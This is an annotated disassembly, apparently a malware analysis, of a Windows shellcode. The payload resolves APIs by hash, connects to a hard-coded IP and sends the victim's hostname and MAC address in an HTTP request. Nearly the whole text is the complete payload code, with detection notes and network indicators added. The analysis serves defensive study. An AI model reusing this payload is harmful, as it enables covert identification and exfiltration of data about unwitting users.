; --------------------------------------------------------------------------- | |
; File Name : C:\Users\gho\Desktop\fbi-sc.bin | |
; Gareth Owen, University of Portsmouth | |
; Load in Notepad++ for syntax highlighting | |
; Entry stub. Save every register, force forward direction for the string
; instructions used later (movsb/scasb rely on DF=0), then `call start`:
; the pushed return address is the address of LocateProc immediately below,
; and `start` pops it into ebp. From then on ebp is both the resolver entry
; point (`call ebp`) and the base for position-independent data references.
pusha | |
cld ; direction flag clear for string ops | |
call start ; ebp=locate | |
; ebp also used as position independent data pointer ebp[offset] | |
; metasploit function resolver | |
; https://github.com/iagox86/nbtool/blob/master/samples/shellcode-win32/block_api.asm | |
; function hashes: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py | |
; | |
; push onto stack: hash of function name and parameters | |
; runs api call | |
; returns result through eax | |
; | |
; LocateProc — the Metasploit "block_api" resolver (position-independent,
; import-free API lookup).
; Calling convention: push the API's arguments, push the 32-bit hash, `call ebp`.
; Walks PEB->Ldr->InMemoryOrderModuleList, hashes each module's base name
; (uppercased, byte-wise including the UTF-16 zero bytes, ROR-13) and each
; export name (ROR-13, including the terminating NUL), and compares the sum
; against the caller's hash. On a match it unwinds its own frame so the
; target API sees the caller's arguments and return address directly, and
; tail-jumps to it. There is no end-of-list check: an unresolvable hash
; keeps walking the list.
; Detection note: fs:[30h] PEB walking plus ROR-13 hashing is a well-known
; shellcode fingerprint; the hash constants used by the caller are the
; standard Metasploit values.
LocateProc: ; DATA CROSSREF: 00000092 | |
; 0000009 | |
hashcode = dword ptr -4 | |
pusha | |
mov ebp, esp | |
; Frame after pushad: [ebp+00h..1Ch] = saved edi..eax, [ebp+20h] = return
; address into the caller, [ebp+24h] = the hash the caller pushed.
xor edx, edx | |
mov edx, fs:[edx+30h] ; PEB location | |
mov edx, [edx+0Ch] ; module list / PEB->ldr | |
mov edx, [edx+14h] ; first module | |
; Per module: esi = BaseDllName buffer (UTF-16), ecx = its length in bytes,
; edi = running module-name hash.
next_mod: ; CODE CROSSREF: LocateProc+87 | |
mov esi, [edx+28h] | |
movzx ecx, word ptr [edx+26h] | |
xor edi, edi | |
; Uppercase each byte >= 'a' (signed compare, so high bytes are left alone),
; then hash = ror(hash, 13) + byte.
loop_modname: ; CODE CROSSREF: LocateProc+26 | |
xor eax, eax | |
lodsb | |
cmp al, 61h ; 'a' | |
jl short not_lowercase | |
sub al, 20h ; ' ' | |
not_lowercase: ; CODE CROSSREF: LocateProc+1D | |
ror edi, 0Dh | |
add edi, eax | |
loop loop_modname | |
; Save the list entry ([ebp-4]) and the module hash ([ebp-8]), then locate
; the export directory: edx = DllBase, e_lfanew at +3Ch, export RVA at +78h.
; A module with no exports is skipped.
push edx | |
push edi | |
mov edx, [edx+10h] | |
mov eax, [edx+3Ch] | |
add eax, edx | |
mov eax, [eax+78h] | |
test eax, eax | |
jz short get_next_mod1 | |
add eax, edx | |
push eax | |
mov ecx, [eax+18h] | |
; eax = export directory VA (also saved at [ebp-0Ch]), ecx = NumberOfNames,
; ebx = AddressOfNames; names are walked backwards.
loc_46: | |
mov ebx, [eax+20h] | |
add ebx, edx | |
get_next_func: ; CODE CROSSREF: LocateProc+60 | |
jecxz short get_next_mod | |
dec ecx | |
mov esi, [ebx+ecx*4] | |
add esi, edx | |
xor edi, edi | |
; ah is zero (from xor eax,eax), so `cmp al, ah` stops on the NUL — after it
; has already been folded into the hash.
loop_funcname: ; CODE CROSSREF: LocateProc+58 | |
xor eax, eax | |
lodsb | |
ror edi, 0Dh | |
add edi, eax | |
cmp al, ah | |
jnz short loop_funcname | |
; module hash + function hash must equal the caller's hash
add edi, [ebp-8] | |
cmp edi, [ebp+24h] | |
jnz short get_next_func | |
; Match: ecx is the name index. Look up its ordinal (AddressOfNameOrdinals,
; +24h) and then the function RVA (AddressOfFunctions, +1Ch); eax = VA.
pop eax | |
mov ebx, [eax+24h] | |
add ebx, edx | |
mov cx, [ebx+ecx*2] | |
mov ebx, [eax+1Ch] | |
add ebx, edx | |
mov eax, [ebx+ecx*4] | |
add eax, edx | |
; Store the VA into the pushad slot for eax (esp+24h == ebp+1Ch here) so popa
; hands it back; drop the two saved locals, restore registers, then rewrite
; the stack so that the hash is removed and the caller's return address sits
; on top: the API returns straight to the caller.
mov [esp+28h+hashcode], eax | |
pop ebx ; stack cleanup before api call | |
pop ebx | |
popa | |
pop ecx | |
pop edx | |
push ecx ; caller's return address | |
jmp eax ; run api call | |
; --------------------------------------------------------------------------- | |
; No match in this module: discard export dir / hash, restore the list entry
; and follow Flink to the next module.
get_next_mod: ; CODE CROSSREF: LocateProc:get_next_func | |
pop eax | |
get_next_mod1: ; CODE CROSSREF: LocateProc+37 | |
pop edi | |
pop edx | |
mov edx, [edx] | |
jmp short next_mod | |
LocateProc endp ; sp-analysis failed | |
; --------------------------------------------------------------------------- | |
; Retry budget for connect(): a data byte sitting in the code stream that
; the connect loop decrements in place (`dec [connectTryCounter]`).
connectTryCounter db 5 ; DATA CROSSREF: 00000106 | |
; --------------------------------------------------------------------------- | |
; start — main body. Runs with ebp = address of LocateProc (call/pop above),
; so every `call ebp` below is an API call through the hash resolver and the
; [label] operands are ebp-relative, position-independent references.
; Sequence: verify the payload is intact; LoadLibraryA ws2_32 and IPHLPAPI;
; WSAStartup; create a TCP socket; connect to the hard-coded sockAddr (up to
; 5 tries); build one HTTP GET that carries the machine's hostname (Host:)
; and MAC address (Cookie: ID=) and send it; close the socket; finally hand
; control to the trampoline stub that was appended to the request buffer.
start: ; CODE CROSSREF: 00000002 | |
pop ebp ; ebp=locate | |
; | |
; Integrity check: the first dword of getRequestStr must still read "GET "
; (IDA prints the little-endian dword as ' TEG'). On failure all network
; activity is skipped and control goes straight to the trampoline.
cmp dword ptr [getRequestStr ], ' TEG' ; sanity check - did exploit suceed OK? | |
jnz short error | |
; LoadLibraryA("ws2_32") then LoadLibraryA("IPHLPAPI"); a NULL handle -> error
lea eax, [ws2_32_dll] ; "ws2_32" | |
push eax | |
push 726774Ch ; kernel32.dll!LoadLibraryA | |
call ebp | |
test eax, eax | |
jz short error | |
lea eax, [iphlpapi_dll] ; "IPHLPAPI" | |
push eax | |
push 726774Ch ; kernel32.dll!LoadLibraryA | |
call ebp | |
test eax, eax | |
jz short error | |
; WSAStartup(0x190, <0x190-byte stack buffer>); the WSADATA is discarded and
; only the zero return code matters. eax == 0 afterwards and is reused as
; the 0/1/2 arguments for WSASocketA.
mov ebx, 190h | |
sub esp, ebx | |
push esp ; buffer for WSA info | |
push ebx ; wVersionRequested = 400 | |
push 6B8029h ; ws2_32.dll!WSAStartup | |
call ebp | |
add esp, ebx ; ditch wsa info - we dont want it | |
test eax, eax ; still check we got an ok result though | |
jnz short error | |
; WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0) -> ebx; INVALID_SOCKET (-1) -> error
push eax ; no flags | |
push eax ; no group action | |
push eax ; no protocol info | |
push eax ; no protocol specified | |
inc eax ; eax=1 | |
push eax ; SOCK_STREAM | |
inc eax ; eax=2 | |
push eax ; addrfamily=AF_INET | |
push 0E0DF0FEAh ; ws2_32.dll!WSASocketA | |
call ebp | |
xor ebx, ebx | |
not ebx | |
cmp ebx, eax | |
jz short error | |
mov ebx, eax | |
; connect(ebx, &sockAddr, 16); connect returns 0 on success. On failure the
; in-code counter is decremented and the call retried until it hits zero.
loc_F1: ; CODE CROSSREF: 0000010C | |
push 10h ; length | |
lea esi, [sockAddr] ; sockaddr struct -- FBI IP here | |
push esi ; sockaddr struct | |
push ebx ; socket | |
push 6174A599h ; ws2_32.dll!connect | |
call ebp | |
test eax, eax | |
jz short connected | |
dec [connectTryCounter] | |
jnz short loc_F1 ; retry to connect up to 5 times | |
; Shared exit path, reached from every failure and from closesocket. If the
; request was never sent (flag == 0) the header plus trampoline stub are
; appended now so the stub exists in the buffer; either way the quasi_strlen
; inside leaves edi one past the request's NUL, i.e. on the copied stub, and
; `jmp edi` transfers control into that data buffer.
error: ; CODE CROSSREF: 0000009C | |
; 000000AE | |
cmp [SentToFBIFlag], 1 | |
jz short setupcrash ; did shellcode suceed? | |
call httpHeaderConstruct | |
jmp short jmptocrashcode ; jumps to crash code in middle of data | |
; --------------------------------------------------------------------------- | |
setupcrash: ; CODE CROSSREF: 00000115 | |
call httpRequestLengthCalc | |
jmptocrashcode: ; CODE CROSSREF: 0000011C | |
jmp edi ; jumps to crash code in middle of data | |
; --------------------------------------------------------------------------- | |
; connected: gethostname(buf, 0x100) into a stack buffer; the buffer pointer
; is carried across the call via the extra `push edx` / `pop edi` pair.
connected: ; CODE CROSSREF: 00000104 | |
mov eax, 100h | |
sub esp, eax | |
mov edx, esp | |
push edx | |
push eax ; buffer length=100h | |
push edx ; name buffer | |
push 1DE49B6h ; ws2_32.dll!gethostname | |
call ebp | |
pop edi | |
add esp, 100h | |
test eax, eax ; check result | |
jnz closesocket | |
; Host: field. edx = min(strlen(hostname), 0x20) (signed compare). The
; quasi_strlen on getRequestStr plus `dec edi` leaves edi on the NUL after
; "Host: ", so the hostname and then the 13-byte cookieStr prefix are
; appended in place; addrtoputmacaddr records where the MAC string goes.
push edi | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
pop esi | |
mov edx, ecx | |
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"... | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
dec edi | |
cmp edx, 20h ; ' ' ; sanity check.. | |
jl short loc_166 ; append user's host address to Host field of http header | |
mov edx, 20h ; ' ' | |
loc_166: ; CODE CROSSREF: 0000015F | |
mov ecx, edx ; append user's host address to Host field of http header | |
push esi | |
rep movsb | |
mov ecx, 0Dh | |
lea esi, [cookieStr] ; now append cookie string | |
rep movsb | |
mov [addrtoputmacaddr], edi | |
pop esi | |
; gethostbyname(hostname) -> hostent*. Require h_length (offset 0Ah) >= 4
; and take the first entry of h_addr_list (offset 0Ch) as the local IPv4.
push esi ; our local hostname, resolve to ip | |
push 803428A9h ; ws2_32.dll!gethostbyname | |
call ebp | |
test eax, eax ; eax = hostent | |
jz closesocket ; gethostbyname failed! | |
mov cx, [eax+0Ah] | |
cmp cx, 4 ; result sanity check | |
jb closesocket | |
lea eax, [eax+0Ch] | |
mov eax, [eax] | |
mov ecx, [eax] | |
mov ecx, [ecx] ; ip addr | |
; SendARP(ip, ip, <0x100-byte stack buffer>, &len) with len preset to 0x100
; (edi points at the len dword). The return value is never acted on: the
; `add esp` following `test eax, eax` overwrites the flags before any branch.
; Only the returned length (>= 6) is checked.
mov eax, 100h | |
push eax | |
mov edi, esp | |
sub esp, eax | |
mov esi, esp | |
push edi ; mac addr length | |
push esi ; mac addr destination | |
push ecx ; srcip | |
push ecx ; destip | |
push 0B8D27248h ; iphlpapi.dll!SendARP | |
call ebp ; get PC mac address | |
test eax, eax | |
add esp, 104h | |
movzx ecx, word ptr [edi] | |
cmp ecx, 6 ; check mac addr right length (48bit) | |
jb short closesocket | |
; Convert the first 6 MAC bytes into 12 uppercase hex digits in a 16-byte
; stack buffer. Loop state: esi = MAC bytes, edi = output cursor, ecx = 6.
; The two pushes save the buffer size (0x10) and the output length (12).
mov ecx, 6 | |
mov eax, 10h | |
sub esp, eax | |
mov edi, esp | |
mov edx, ecx | |
shl edx, 1 | |
push eax | |
push edx | |
macaddrtostring: ; CODE CROSSREF: 0000020B | |
xor edx, edx ; converts binary MAC address to a string | |
; for incorporation into a http request | |
mov dl, [esi] | |
mov al, dl | |
and al, 0F0h ; high nibble | |
shr al, 4 | |
cmp al, 9 | |
ja short loc_1F4 | |
add al, 30h ; '0' | |
jmp short loc_1F6 | |
; --------------------------------------------------------------------------- | |
loc_1F4: ; CODE CROSSREF: 000001EE | |
add al, 37h ; '7' | |
loc_1F6: ; CODE CROSSREF: 000001F2 | |
mov [edi], al | |
inc edi | |
mov al, dl | |
and al, 0Fh ; low nibble | |
cmp al, 9 | |
ja short loc_205 | |
add al, 30h ; '0' | |
jmp short loc_207 | |
; --------------------------------------------------------------------------- | |
loc_205: ; CODE CROSSREF: 000001FF | |
add al, 37h ; '7' | |
loc_207: ; CODE CROSSREF: 00000203 | |
mov [edi], al | |
inc edi | |
inc esi | |
loop macaddrtostring ; converts binary MAC address to a string | |
; for incorporation into a http request | |
; Copy the 12-char string into the request at addrtoputmacaddr. The stack
; buffer is released (`add esp, eax`) before the copy, so esi points below
; esp during `rep movsb`; that only holds because nothing touches the stack
; in between.
pop ecx | |
sub edi, ecx | |
mov esi, edi ; move mac address string to http request | |
pop eax | |
add esp, eax | |
mov edi, [addrtoputmacaddr] | |
rep movsb | |
; Mark the request as built, append the remaining header, then
; send(ebx, getRequestStr, len, 0). httpHeaderConstruct returns ecx = request
; length and edi one past the NUL, hence `sub edi, ecx` / `dec edi`.
mov [SentToFBIFlag], 1 | |
call httpHeaderConstruct ; append remainder of header | |
xor eax, eax | |
push eax ; flags | |
push ecx ; length | |
sub edi, ecx ; put buffer pointer back to beginning of buffer | |
dec edi | |
push edi ; buffer | |
push ebx ; socket | |
push 5F38EBC2h ; ws2_32.dll!send | |
call ebp | |
; closesocket(ebx), then fall into the shared exit path above
closesocket: ; CODE CROSSREF: 00000141 | |
; 00000189 ... | |
push ebx | |
push 614D6E75h ; ws2_32.dll!closesocket | |
call ebp | |
jmp error | |
; =============== S U B R O U T I N E ======================================= | |
; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
; quasi_strlen — strlen() built on repne scasb.
; In:   edi = NUL-terminated string; requires DF=0 (cld at entry)
; Out:  ecx = length, not counting the NUL
;       edi = one byte PAST the terminating NUL (callers `dec edi` to sit on it)
;       eax = 0
; Clobbers: eax, ecx, edi, flags.
; ecx starts at 0xFFFFFFFF; repne scasb stops after consuming the NUL, so
; `not ecx` yields the byte count including the NUL and `dec ecx` drops it.
quasi_strlen ; CODE CROSSREF: 00000148 | |
; 00000156 ... | |
xor ecx, ecx | |
not ecx | |
loc_24A: | |
xor eax, eax | |
repne scasb | |
loc_24E: | |
not ecx | |
dec ecx | |
retn | |
quasi_strlen endp | |
; --------------------------------------------------------------------------- | |
; Writable state embedded in the code stream (the payload runs from a
; writable region and patches itself).
; addrtoputmacaddr: position inside getRequestStr where the hex MAC is written.
addrtoputmacaddr dd 0 ; DATA CROSSREF: 00000178 | |
; 00000215 | |
; SentToFBIFlag: 0 until the request has been assembled and sent; selects
; which entry of httpHeaderConstruct the exit path uses.
SentToFBIFlag db 0 ; DATA CROSSREF: error | |
; 0000021D | |
; =============== S U B R O U T I N E ======================================= | |
; httpHeaderConstruct — append the fixed trailer to getRequestStr.
; Copies 0x4F (79) bytes starting at httpHeaderStr onto the end of the
; request. That is more than the 65-byte header string (its NUL included):
; the remaining 14 bytes are the code stub assembled directly after
; httpHeaderStr, which therefore lands in the request buffer right after the
; NUL and is what the exit path later jumps to.
; Second entry point httpRequestLengthCalc only measures the request.
; Out (both entries): ecx = strlen(getRequestStr), edi = one past its NUL
; (= the copied stub), eax = 0. Clobbers: eax, ecx, esi, edi, flags.
httpHeaderConstruct ; CODE CROSSREF: 00000117 | |
; 00000224 | |
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"... | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
dec edi ; remove null pointer | |
mov ecx, 4Fh ; 'O' | |
lea esi, [httpHeaderStr] ; "\r\nConnection: keep-alive\r\nAccept: */*\r\n"... | |
rep movsb ; append httpheaderstr | |
httpRequestLengthCalc: ; CODE CROSSREF: setupcrash | |
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"... | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
retn | |
httpHeaderConstruct endp | |
; --------------------------------------------------------------------------- | |
; Fixed HTTP header trailer, 65 bytes including the terminating NUL. The
; 14 bytes of code that follow it are copied along with it (see the 0x4F
; count in httpHeaderConstruct). These header values are part of the
; request's on-the-wire signature.
httpHeaderStr db 0Dh,0Ah ; DATA CROSSREF: httpHeaderConstruct+11 | |
db 'Connection: keep-alive',0Dh,0Ah | |
db 'Accept: */*',0Dh,0Ah | |
db 'Accept-Encoding: gzip',0Dh,0Ah | |
db 0Dh,0Ah,0 | |
; --------------------------------------------------------------------------- | |
; Trampoline stub. Not executed here: it is copied, as the tail of the
; 0x4F-byte block beginning at httpHeaderStr, into the request buffer just
; after the header's NUL, and is entered by `jmp edi` in the exit path once
; quasi_strlen has left edi on that copy. Running there it skips its own 14
; bytes, scans forward over the zero padding of the request buffer, and jumps
; to the first non-zero byte — the 90h at the end of this payload — so
; execution continues into whatever follows the shellcode. Note that this is
; code running out of a writable data buffer.
add edi, 0Eh ; gets copied with the above to end of getrequeststr | |
; it's then jumped to by the crash jmps | |
; searches for non-null characters and runs them | |
xor ecx, ecx | |
not ecx ; scan for nonnull characcter and jmp to it | |
xor eax, eax | |
repe scasb | |
dec edi | |
jmp edi ; prob the nop at 0x3bb | |
; --------------------------------------------------------------------------- | |
; --- data, addressed ebp-relative from the code above ---
; cookieStr: 13 bytes ("\r\nCookie: ID="); the 12-char hex MAC is written
; immediately after it.
cookieStr db 0Dh,0Ah ; DATA CROSSREF: 00000170 | |
db 'Cookie: ID=' | |
; library names passed to LoadLibraryA
ws2_32_dll db 'ws2_32',0 ; DATA CROSSREF: 0000009E | |
iphlpapi_dll db 'IPHLPAPI',0 ; DATA CROSSREF: 000000B0 | |
; sockaddr_in for connect(): sin_family = AF_INET (2), sin_port = 0x0050
; (80, network byte order), sin_addr = 65.222.202.54. This hard-coded
; endpoint is the primary network indicator for the payload.
sockAddr db 2 ; DATA CROSSREF: 000000F3 | |
; sa_family | |
sockaddr_in db 0 ; sin_family | |
db 0 ; port | |
db 50h ; P ; port=80 | |
db 41h ; A ; ip addr = 65.222.202.54 | |
db 0DEh ; Ţ | |
db 0CAh ; Ę | |
db 36h ; 6 | |
; Request template. The hostname (at most 32 bytes), "\r\nCookie: ID=<MAC>"
; and httpHeaderStr are appended in place after "Host: ", so the zero bytes
; below are working buffer. Its first dword ("GET ") doubles as the integrity
; check at start. The finished request — this GUID path, Host = victim
; hostname, Cookie: ID = victim MAC — is what to look for on the wire.
getRequestStr db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah | |
; DATA CROSSREF: 00000092 | |
; 00000150 ... | |
db 'Host: ',0 | |
db 0 ; buffer space for construction of complete http request | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
; First non-zero byte after the buffer: the trampoline stub's scan stops
; here, execution lands on the nop and falls through past the payload.
db 90h ; the terminal no-op | |